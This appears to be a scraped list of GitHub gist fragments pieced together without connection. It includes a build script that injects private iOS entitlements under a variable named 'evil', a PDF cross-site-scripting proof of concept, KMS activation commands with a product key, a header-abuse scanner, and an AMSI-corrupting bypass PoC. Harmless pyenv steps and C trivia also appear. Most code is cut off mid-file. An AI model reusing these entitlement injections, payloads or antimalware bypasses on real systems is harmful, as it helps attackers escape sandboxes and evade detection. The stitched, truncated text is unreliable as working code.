import os
# preinstalled python is python2
filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'
evil = '''
<!---><!-->
<key>platform-application</key>
<true/>
<key>com.apple.private.security.no-container</key>
<true/>
=== iBridge2,1,iBridge2,3,iBridge2,4,iBridge2,5,iBridge2,7,iBridge2,8_3.5_16P5200_Restore.ipsw
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
@judero01col
judero01col / Service KMS
Last active May 14, 2025 08:09
Volume License Activation Key Service - KMS
## Find Available Target Editions
DISM.exe /Online /Get-TargetEditions
## Convert Server Standard 2019 Evaluation to Server Standard 2019
DISM /online /Set-Edition:ServerStandard /ProductKey:N69G4-B89J2-4G8F4-WWYCC-J464C /AcceptEula
## How To Activate
slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX
slmgr /skms [server]:[port]
slmgr /ato
@ndavison
ndavison / hbh-header-abuse-test.py
Last active February 2, 2025 12:51
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")
@entropiae
entropiae / Install pyenv on Ubuntu 18.04 + fish shell
Last active March 15, 2025 06:14
Install pyenv on Ubuntu 18.04 + Fish shell
Install pyenv on Ubuntu 18.04 + fish shell
- Install the packages required to compile Python
$ sudo apt-get update; sudo apt-get install --no-install-recommends make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev
- Download pyenv code from github
$ git clone https://github.com/pyenv/pyenv.git ~/.pyenv
- Define environment variable PYENV_ROOT to point to the path where pyenv repo is cloned
$ echo "set --export PYENV_ROOT $HOME/.pyenv" > ~/.config/fish/conf.d/pyenv.fish
@adrianyy
adrianyy / drvscan.cpp
Created May 2, 2019 16:37
vulnerable driver scanner
#include <string>
#include <vector>
#include <fstream>
#include <iostream>
#include <filesystem>
#include <Windows.h>
#include <winternl.h>
static_assert( sizeof( void* ) == 8 );
@mattifestation
mattifestation / CorruptCLRGlobal.ps1
Created December 7, 2018 12:45
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the first DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
@fay59
fay59 / Quirks of C.md
Last active April 3, 2025 02:27
Quirks of C

Here's a list of mildly interesting things about the C language that I learned mostly by consuming Clang's ASTs. Although surprises are getting sparser, I might continue to update this document over time.

There are many more mildly interesting features of C++, but the language is literally known for being weird, whereas C is usually considered smaller and simpler, so this is (almost) only about C.

1. Combined type and variable/field declaration, inside a struct scope [https://godbolt.org/g/Rh94Go]

struct foo {
   struct bar {
      int x;
@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022